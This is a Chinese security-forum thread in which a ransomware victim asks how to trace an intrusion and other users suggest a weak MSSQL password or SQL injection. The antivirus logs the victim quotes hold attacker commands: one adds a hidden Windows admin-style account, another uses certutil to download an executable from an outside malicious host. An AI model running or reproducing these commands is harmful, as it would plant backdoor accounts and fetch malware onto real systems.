首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 软件逆向
    3. 发新帖
[求助][求助]【被勒索】国庆期间 中了勒索病毒,被黑客搞了几万块!现在又来攻击,求方案
发表于: 2024-10-21 15:25 4007

[求助][求助]【被勒索】国庆期间 中了勒索病毒,被黑客搞了几万块!现在又来攻击,求方案

反勒索学习11 活跃值
2024-10-21 15:25
4007

后缀 bixi 解密
被勒索!! 了几万块!

缴纳赎金后 重新装系统了。
现在观察,杀毒软件的日志如下附件

如何找到源头
操作目标:【执行】 C:\Windows\System32\net.exe
操作目标参数:net user k8h3d k8d3j9SjfS7 /ADD


[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

最后于 2024-10-21 15:52 被反勒索学习11编辑 ,原因:
上传的附件:
收藏
免费 0
支持
分享
最新回复 (7)
反勒索学习11
雪    币: 40
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
2
反勒索每个技术员的正向爱好
2024-10-21 19:11
0
twe
雪    币: 82
活跃值: (604)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
twe
3
感觉是sql 注入漏洞进来的
2024-10-22 15:51
0
boursonjane
雪    币: 2345
活跃值: (3064)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
4
这不是驱动人生那个勒索的账号密码么
2024-10-22 16:16
0
风铃i
雪    币: 1264
活跃值: (1179)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
5
mssql 弱口令,自己检查下密码
2024-10-22 16:27
0
厌倦
雪    币: 1478
活跃值: (1923)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
建议关机
2024-10-23 09:39
0
反勒索学习11
雪    币: 40
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
私信
7

2024.10.1 1点中毒,勒索信--见--本楼回复的。附件,发邮件给黑客,说3000美元一个ID,


防护项目:数据库

操作目标:【执行】 C:\Windows\System32\certutil.exe

操作目标参数:certutil  -urlcache -split -f http://dl.haqo.net/dll.exe?fr=mssql c:\setupinstalled.exe

操作结果:已阻止

这一条,  这个网站http://dl.haqo.net/dll.exe  杀毒软件 提示是盗号木马, 

最后于 2024-10-23 14:41 被反勒索学习11编辑 ,原因:
上传的附件:
2024-10-23 14:29
0
twe
雪    币: 82
活跃值: (604)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
twe
8
漏洞修补就行了,给你私信了。
2024-10-23 15:53
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//